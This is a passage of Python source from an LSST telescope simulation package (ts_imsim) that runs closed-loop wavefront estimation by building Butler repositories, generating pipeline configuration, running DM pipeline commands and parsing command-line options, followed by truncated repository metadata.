sensors.\n\n Parameters\n ----------\n seq_num : int\n Observation id.\n butler_root_path : str\n Path to the butler gen3 repos.\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n num_pro : int, optional\n Number of processor to run DM pipeline. (the default is 1.)\n pipeline_file : str or None, optional\n Path to existing pipeline yaml file to use.\n If None then the code will write its own default pipeline yaml.\n (The default is None.)\n filter_type_name : str, optional\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n\n Returns\n -------\n list[lsst.ts.imsim.utils.SensorWavefrontError]\n List of SensorWavefrontError with the results of the wavefront\n estimation pipeline for each sensor.\n \"\"\"\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n if pipeline_file is None:\n pipeline_yaml = f\"{getCamNameFromCamType(cam_type)}Pipeline.yaml\"\n pipeline_yaml_path = os.path.join(butler_root_path, pipeline_yaml)\n self.write_wep_configuration(cam_type, pipeline_yaml_path, filter_type_name)\n else:\n pipeline_yaml_path = pipeline_file\n\n butler = dafButler.Butler(butler_root_path)\n\n if f\"LSST{butler_inst_name}/calib\" not in butler.registry.queryCollections():\n self.log.info(\"Ingesting curated calibrations.\")\n\n runProgram(\n f\"butler write-curated-calibrations {butler_root_path} lsst.obs.lsst.Lsst{butler_inst_name}\"\n )\n # Sequence number or seq_num is an integer number\n # associated with each image taken in a single day.\n # The limit for seq_num is 5 digits,\n # set by the expectation that no more than 100K images\n # could be taken in a single day (i.e. no more than 1/sec).\n if cam_type == CamType.LsstCam:\n runProgram(\n f\"pipetask run -b {butler_root_path} \"\n f\"-i refcats,LSST{butler_inst_name}/raw/all,LSST{butler_inst_name}/calib/unbounded \"\n f\"--instrument lsst.obs.lsst.Lsst{butler_inst_name} \"\n f\"--register-dataset-types --output-run ts_imsim_{seq_num} -p {pipeline_yaml_path} -d \"\n f'\"visit.seq_num IN ({seq_num})\" -j {num_pro}'\n )\n elif cam_type in (CamType.LsstFamCam, CamType.ComCam):\n runProgram(\n f\"pipetask run -b {butler_root_path} \"\n f\"-i refcats,LSST{butler_inst_name}/raw/all,LSST{butler_inst_name}/calib/unbounded \"\n f\"--instrument lsst.obs.lsst.Lsst{butler_inst_name} \"\n f\"--register-dataset-types --output-run ts_imsim_{seq_num} -p {pipeline_yaml_path} -d \"\n f'\"visit.seq_num IN ({seq_num-1}, {seq_num})\" -j {num_pro}'\n )\n\n # Need to redefine butler because the database changed.\n butler = dafButler.Butler(butler_root_path)\n\n dataset_refs = butler.registry.queryDatasets(\n datasetType=\"zernikeEstimateAvg\", collections=[f\"ts_imsim_{seq_num}\"]\n )\n\n # Get the map for detector Id to detector name\n camera = butler.get(\n \"camera\",\n {\"instrument\": f\"LSST{butler_inst_name}\"},\n collections=[f\"LSST{butler_inst_name}/calib/unbounded\"],\n )\n det_id_map = camera.getIdMap()\n det_name_map = camera.getNameMap()\n\n list_of_wf_err = []\n\n for dataset in dataset_refs:\n data_id = {\n \"instrument\": dataset.dataId[\"instrument\"],\n \"detector\": dataset.dataId[\"detector\"],\n \"visit\": dataset.dataId[\"visit\"],\n }\n\n zer_coeff = butler.get(\n \"zernikeEstimateAvg\",\n dataId=data_id,\n collections=[f\"ts_imsim_{seq_num}\"],\n )\n\n sensor_wavefront_data = SensorWavefrontError()\n sensor_name = det_id_map[dataset.dataId[\"detector\"]].getName()\n sensor_wavefront_data.sensor_name = sensor_name\n sensor_wavefront_data.sensor_id = det_name_map[sensor_name].getId()\n sensor_wavefront_data.annular_zernike_poly = zer_coeff\n\n list_of_wf_err.append(sensor_wavefront_data)\n\n return list_of_wf_err\n\n def write_wep_configuration(\n self, cam_type: CamType, pipeline_yaml_path: str, filter_type_name: str\n ) -> None:\n \"\"\"Write wavefront estimation pipeline task configuration.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n pipeline_yaml_path : str\n Path where the pipeline task configuration yaml file\n should be saved.\n filter_type_name : str\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n \"\"\"\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n\n # Remap reference filter\n filter_type_name = self.map_filter_ref_to_g(filter_type_name)\n\n with open(pipeline_yaml_path, \"w\") as fp:\n fp.write(\n f\"\"\"# This yaml file is used to define the tasks and configuration of\n# a Gen 3 pipeline used for testing in ts_wep.\ndescription: wep basic processing test pipeline\n# Here we specify the corresponding instrument for the data we\n# will be using.\ninstrument: lsst.obs.lsst.Lsst{butler_inst_name}\n# Use imported instrument configuration\nimports:\n - location: {getWepConfigDir()}/cwfs/instData/{getCamNameFromCamType(cam_type)}/instParamPipeConfig.yaml\n# Then we can specify each task in our pipeline by a name\n# and then specify the class name corresponding to that task\ntasks:\n isr:\n class: lsst.ip.isr.isrTask.IsrTask\n # Below we specify the configuration settings we want to use\n # when running the task in this pipeline. Since our data doesn't\n # include bias or flats we only want to use doApplyGains and\n # doOverscan in our isr task.\n config:\n connections.outputExposure: 'postISRCCD'\n doBias: False\n doVariance: False\n doLinearize: False\n doCrosstalk: False\n doDefect: False\n doNanMasking: False\n doInterpolate: False\n doBrighterFatter: False\n doDark: False\n doFlat: False\n doApplyGains: True\n doFringe: False\n doOverscan: True\n python: OverscanCorrectionTask.ConfigClass.fitType = 'MEDIAN'\n generateDonutCatalogWcsTask:\n class: lsst.ts.wep.task.generateDonutCatalogWcsTask.GenerateDonutCatalogWcsTask\n\"\"\"\n )\n\n def run_img(\n self,\n inst: str,\n filter_type_name: str,\n rot_cam_in_deg: float,\n boresight: list[float],\n mjd: float,\n star_mag: float,\n base_output_dir: str,\n path_sky_file: str,\n do_erase_dir_content: bool,\n sky_seed: int,\n pert_seed: int,\n iter_num: int,\n pipeline_file: str,\n imsim_config_pointer_file: str,\n turn_off_sky_background: bool,\n turn_off_atmosphere: bool,\n turn_off_wavefront_estimates: bool,\n num_pro: int,\n raw_seeing: float,\n ) -> None:\n \"\"\"Run the simulation of images.\n\n Parameters\n ----------\n inst : str\n Instrument to use: currently only lsst.\n filter_type_name : str\n Filter type name: ref, u, g, r, i, z, or y.\n rot_cam_in_deg : float\n The camera rotation angle in degree (-90 to 90).\n boresight : list[float]\n Boresight [ra, dec] in degree.\n mjd : float\n MJD of the observation.\n star_mag : float\n Magnitude of stars if using default sky file.\n base_output_dir : str\n Base output directory.\n path_sky_file : str\n Path to the sky file.\n do_erase_dir_content : bool\n Do the erase of the content of base output directory or not.\n sky_seed : int\n Random seed for the sky background.\n pert_seed : int\n Random seed for the perturbations.\n iter_num : int\n Number of closed-loop iteration.\n pipeline_file : str\n Path to existing pipeline yaml file to use. If empty string\n then the code will write its own default pipeline yaml.\n imsim_config_pointer_file : str\n Path to pointer file with locations of yaml configuration\n files for imsim submodules. If empty string then the code\n will use the default in policy/config for the given inst.\n turn_off_sky_background : bool\n If set to True then the closed loop will simulate images\n without sky background.\n turn_off_atmosphere : bool\n If set to True then will turn off the imsim atmosphere.\n turn_off_wavefront_estimates : bool\n If set to True then will run the closed loop only with\n the OPD.fits files and not simulated images.\n num_pro : int\n Number of processors to use.\n raw_seeing : float\n Raw seeing in arcsec.\n \"\"\"\n cam_type = getCamType(inst)\n base_output_dir = self.check_and_create_base_output_dir(base_output_dir)\n if do_erase_dir_content:\n self.erase_directory_content(base_output_dir)\n self.check_boresight(boresight)\n self.boresight_ra = boresight[0]\n self.boresight_dec = boresight[1]\n self.boresight_rot_ang = rot_cam_in_deg\n # Remap the reference filter to g\n filter_type_name = self.map_filter_ref_to_g(filter_type_name)\n\n if turn_off_wavefront_estimates is True:\n self.use_ccd_img = False\n\n obs_metadata = ObsMetadata(\n ra=self.boresight_ra,\n dec=self.boresight_dec,\n band=filter_type_name.lower(),\n rotator_angle=self.boresight_rot_ang,\n mjd=mjd,\n raw_seeing=raw_seeing,\n )\n\n # Configure the components\n self.config_sky_sim(\n cam_type, obs_metadata, path_sky_file=path_sky_file, star_mag=star_mag\n )\n self.config_ofc_calc(cam_type)\n self.imsim_cmpt = ImsimCmpt()\n\n # If path_sky_file using default OPD positions write this to disk\n # so that the Butler can load it later\n if path_sky_file == \"\":\n path_sky_file = os.path.join(base_output_dir, \"sky_info.txt\")\n self.sky_sim.export_sky_to_file(path_sky_file)\n self.log.info(f\"Wrote new sky file to {path_sky_file}.\")\n\n # generate butler gen3 repo if needed\n butler_root_path = os.path.join(base_output_dir, \"imsimData\")\n\n if self.use_ccd_img:\n self.generate_butler(butler_root_path, cam_type)\n self.generate_ref_catalog(\n butler_root_path=butler_root_path,\n path_sky_file=path_sky_file,\n filter_type_name=filter_type_name,\n )\n\n self._run_sim(\n cam_type,\n obs_metadata,\n base_output_dir,\n butler_root_path,\n sky_seed,\n pert_seed,\n iter_num,\n num_pro=num_pro,\n pipeline_file=pipeline_file,\n imsim_config_pointer_file=imsim_config_pointer_file,\n turn_off_sky_background=turn_off_sky_background,\n turn_off_atmosphere=turn_off_atmosphere,\n )\n\n def generate_butler(self, butler_root_path: str, cam_type: CamType) -> None:\n \"\"\"Generate butler gen3.\n\n Parameters\n ----------\n butler_root_path: `str`\n Path to where the butler repository should be created.\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n \"\"\"\n\n self.log.info(\n f\"Generating butler gen3 in {butler_root_path} for {cam_type.name}\"\n )\n\n runProgram(f\"butler create {butler_root_path}\")\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n\n self.log.debug(f\"Registering Lsst{butler_inst_name}\")\n runProgram(\n f\"butler register-instrument {butler_root_path} lsst.obs.lsst.Lsst{butler_inst_name}\"\n )\n\n def generate_ref_catalog(\n self, butler_root_path: str, path_sky_file: str, filter_type_name: str\n ) -> None:\n \"\"\"Generate reference star catalog.\n\n Parameters\n ----------\n butler_root_path: `str`\n Path to the butler gen3 repository.\n path_sky_file: `str`\n Path to the catalog star file.\n filter_type_name : str\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n \"\"\"\n self.log.debug(\"Creating reference catalog.\")\n\n cat_dir = os.path.join(butler_root_path, \"skydata\")\n sky_file_name = os.path.join(cat_dir, \"sky_data.csv\")\n cat_config_file_name = os.path.join(cat_dir, \"cat.cfg\")\n sky_ecsv_file_name = os.path.join(cat_dir, \"filename_to_htm.ecsv\")\n cat_log_file_name = os.path.join(cat_dir, \"convert.log\")\n os.mkdir(cat_dir)\n\n # Read sky file and convert it to csv\n sky_data = astropy.io.ascii.read(path_sky_file)\n\n # Constructing the catalog of stars to use in the wavefront estimation\n # pipeline. It is used for target\n # selection, and affects magnitude limits\n # as set in generateDonutCatalogWcsTask pipeline yaml file\n sky_data.rename_column(\"Mag\", filter_type_name)\n\n sky_data.write(sky_file_name, format=\"csv\", overwrite=True)\n\n with open(cat_config_file_name, \"w\") as fp:\n fp.write(\n f\"\"\"config.ra_name='Ra'\nconfig.dec_name='Dec'\nconfig.id_name='Id'\nconfig.mag_column_list=['{filter_type_name}']\nconfig.dataset_config.ref_dataset_name='ref_cat'\n\"\"\"\n )\n\n runProgram(\n f\"convertReferenceCatalog {cat_dir} {cat_config_file_name} {sky_file_name}\",\n stdout=cat_log_file_name,\n stderr=cat_log_file_name,\n )\n\n runProgram(\n f\"butler register-dataset-type {butler_root_path} cal_ref_cat SimpleCatalog htm7\"\n )\n\n runProgram(\n f\"butler ingest-files -t direct {butler_root_path} cal_ref_cat refcats {sky_ecsv_file_name}\"\n )\n\n def ingest_data(self, butler_root_path: str, cam_type: CamType) -> None:\n \"\"\"Ingest data into a gen3 data Butler.\n\n Parameters\n ----------\n butler_root_path : str\n Path to the butler repository.\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n \"\"\"\n output_img_dir = self.imsim_cmpt.output_img_dir\n files = \" \".join(glob(os.path.join(output_img_dir, \"amp*\")))\n\n if cam_type in [CamType.LsstCam, CamType.LsstFamCam, CamType.ComCam]:\n runProgram(f\"butler ingest-raws {butler_root_path} {files}\")\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n\n runProgram(\n f\"butler define-visits {butler_root_path} lsst.obs.lsst.Lsst{butler_inst_name}\"\n )\n\n def erase_directory_content(self, target_dir: str) -> None:\n \"\"\"Erase the directory content.\n\n Parameters\n ----------\n target_dir : str\n Target directory.\n \"\"\"\n\n for file_on in os.listdir(target_dir):\n file_path = os.path.join(target_dir, file_on)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n\n @staticmethod\n def set_default_parser(parser: ArgumentParser) -> ArgumentParser:\n \"\"\"Set the default parser.\n\n Parameters\n ----------\n parser : argparse.ArgumentParser\n Input parser.\n\n Returns\n -------\n argparse.ArgumentParser\n Updated parser.\n \"\"\"\n\n parser.add_argument(\n \"--inst\",\n type=str,\n default=\"lsst\",\n help=\"Instrument to use: currently lsst, lsstfam, comcam. (default: lsst)\",\n )\n\n parser.add_argument(\n \"--filter_type\",\n type=str,\n default=\"\",\n help=\"Filter type to use: u, g, r, i, z, y or empty string for \"\n \"reference wavelength. (default: '')\",\n )\n\n parser.add_argument(\n \"--rot_cam\",\n type=float,\n default=0.0,\n help=\"Rotate camera (degree) in counter-clockwise direction. (default: 0.0)\",\n )\n\n parser.add_argument(\"--output\", type=str, default=\"\", help=\"Output directory.\")\n\n parser.add_argument(\n \"--log_level\", type=int, default=logging.INFO, help=\"Log level.\"\n )\n\n parser.add_argument(\n \"--clobber\",\n default=False,\n action=\"store_true\",\n help=\"Delete existing output directory.\",\n )\n\n parser.add_argument(\n \"--config_pointer_file\",\n type=str,\n default=\"\",\n help=\"Imsim Configuration Pointer File.\",\n )\n\n parser.add_argument(\n \"--sky_seed\",\n type=int,\n default=42,\n help=\"Random seed for imsim sky (default: 42).\",\n )\n\n parser.add_argument(\n \"--pert_seed\",\n type=int,\n default=11,\n help=\"Random seed for m1m3_lut fractional actuator random error. \"\n \"(Default: 11)\",\n )\n\n parser.add_argument(\n \"--iter_num\",\n type=int,\n default=5,\n help=\"Number of closed-loop iterations. (default: 5)\",\n )\n\n parser.add_argument(\n \"--pipeline_file\",\n type=str,\n default=\"\",\n help=\"\"\"\n Location of user-specified pipeline configuration file.\n If left as empty string the code will create a default file.\n (default: '')\n \"\"\",\n )\n\n parser.add_argument(\n \"--num_proc\",\n type=int,\n default=1,\n help=\"Number of processor to run imSim and DM pipeline. (default: 1)\",\n )\n\n return parser\n\n @staticmethod\n def set_img_parser(parser: ArgumentParser) -> ArgumentParser:\n \"\"\"Set the image-specific parser.\n\n Parameters\n ----------\n parser : argparse.ArgumentParser\n Input parser.\n\n Returns\n -------\n argparse.ArgumentParser\n Updated parser.\n \"\"\"\n\n parser.add_argument(\n \"--boresight_deg\",\n type=float,\n nargs=2,\n default=[0, 0],\n help=\"Boresight [ra, dec] in degree. The default is [0, 0].\",\n )\n\n parser.add_argument(\n \"--sky_file\",\n type=str,\n default=\"\",\n help=\"\"\"\n Text file contains the star Id, ra, dec, and magnitude.\n The default is to use the OPD field positions with boresight\n [ra, dec] = [0, 0].\n \"\"\",\n )\n\n parser.add_argument(\n \"--mjd\", type=float, default=60115.33, help=\"Starting MJD of observation.\"\n )\n\n parser.add_argument(\n \"--star_mag\",\n type=float,\n default=15.0,\n help=\"Magnitude of stars if using default sky_file. The default is 15.\",\n )\n\n parser.add_argument(\n \"--turn_off_sky_background\",\n action=\"store_true\",\n help=\"Turn sky brightness model off.\",\n )\n\n parser.add_argument(\n \"--turn_off_atmosphere\", action=\"store_true\", help=\"Turn atmosphere off.\"\n )\n\n parser.add_argument(\n \"--turn_off_wavefront_estimates\",\n action=\"store_true\",\n help=\"\"\"\n Run with true wavefront values only.\n Turns off images generation and running CCDs through WEP.\n \"\"\",\n )\n\n parser.add_argument(\n \"--raw_seeing\",\n type=float,\n default=0.5,\n help=\"Raw seeing in arcsec (default: 0.5).\",\n )\n\n return parser\n", "repo_name": "lsst-ts/ts_imsim", "sub_path": "python/lsst/ts/imsim/closed_loop_task.py", "file_name": "closed_loop_task.py", "file_ext": "py", "file_size_in_byte": 48605, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "88", "api": [{"api_name": "logging.getLogger", "line_number": 36, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 57, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 58, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.sky_sim.SkySim", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 98, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 99, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.opd_metrology.OpdMetrology", "line_number": 127, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 128, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 128, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 128, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 128, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 130, "usage_type": "call"}, {"api_name": "lsst.afw.cameraGeom.FIELD_ANGLE", "line_number": 133, "usage_type": "argument"}, {"api_name": "numpy.rad2deg", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 144, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.rotMatrix", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 155, "usage_type": "call"}, {"api_name": "lsst.ts.ofc.OFC", "line_number": 176, "usage_type": "call"}, {"api_name": "lsst.ts.ofc.OFCData", "line_number": 176, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.getCamNameFromCamType", "line_number": 176, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 216, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 237, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 240, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 240, "usage_type": "name"}, {"api_name": "lsst.afw.cameraGeom.DetectorType.WAVEFRONT", "line_number": 239, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 239, "usage_type": "name"}, {"api_name": "lsst.afw.cameraGeom.DetectorType.SCIENCE", "line_number": 241, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 241, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 249, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 270, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 274, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 274, "usage_type": "name"}, {"api_name": "lsst.afw.cameraGeom.DetectorType.WAVEFRONT", "line_number": 273, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 273, "usage_type": "name"}, {"api_name": "lsst.afw.cameraGeom.DetectorType.SCIENCE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 275, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.make_dir", "line_number": 299, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.FilterType.REF", "line_number": 323, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 323, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_U", "line_number": 325, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 325, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_G", "line_number": 327, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 327, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_R", "line_number": 329, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 329, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_I", "line_number": 331, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 331, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_Z", "line_number": 333, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 333, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_Y", "line_number": 335, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 335, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 303, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 341, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 342, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 395, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 395, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path", "line_number": 437, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.make_dir", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 442, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.make_dir", "line_number": 445, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 449, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 449, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 460, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 460, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 460, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 484, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 484, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 484, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 484, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 556, "usage_type": "call"}, {"api_name": "os.path", "line_number": 556, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 564, "usage_type": "call"}, {"api_name": "os.path", "line_number": 564, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.plot_fwhm_of_iters", "line_number": 565, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 569, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 570, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 608, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 608, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 610, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 610, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 612, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 612, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 614, "usage_type": "call"}, {"api_name": "os.path", "line_number": 614, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.get_config_dir", "line_number": 614, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 621, "usage_type": "call"}, {"api_name": "os.path", "line_number": 621, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 640, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 640, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 644, "usage_type": "call"}, {"api_name": "os.path", "line_number": 644, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 651, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 651, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 651, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 654, "usage_type": "call"}, {"api_name": "os.path", "line_number": 654, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 657, "usage_type": "call"}, {"api_name": "os.path", "line_number": 657, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 658, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 680, "usage_type": "call"}, {"api_name": "os.path", "line_number": 680, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 695, "usage_type": "call"}, {"api_name": "os.path", "line_number": 695, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 698, "usage_type": "call"}, {"api_name": "os.path", "line_number": 698, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 702, "usage_type": "call"}, {"api_name": "os.path", "line_number": 702, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 714, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 716, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.SensorWavefrontError", "line_number": 720, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 780, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 780, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 780, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 782, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 782, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 794, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.getCamNameFromCamType", "line_number": 827, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 828, "usage_type": "call"}, {"api_name": "os.path", "line_number": 828, "usage_type": "attribute"}, {"api_name": "lsst.daf.butler.Butler", "line_number": 833, "usage_type": "call"}, {"api_name": "lsst.daf.butler", "line_number": 833, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 838, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 846, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 846, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 847, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 854, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 854, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 854, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 855, "usage_type": "call"}, {"api_name": "lsst.daf.butler.Butler", "line_number": 864, "usage_type": "call"}, {"api_name": "lsst.daf.butler", "line_number": 864, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.SensorWavefrontError", "line_number": 894, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.utils.SensorWavefrontError", "line_number": 798, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 905, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.getConfigDir", "line_number": 935, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.getCamNameFromCamType", "line_number": 935, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.getCamType", "line_number": 1036, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 1050, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.imsim_cmpt.ImsimCmpt", "line_number": 1064, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1069, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1069, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1074, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1074, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 1099, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1114, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1139, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1140, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1141, "usage_type": 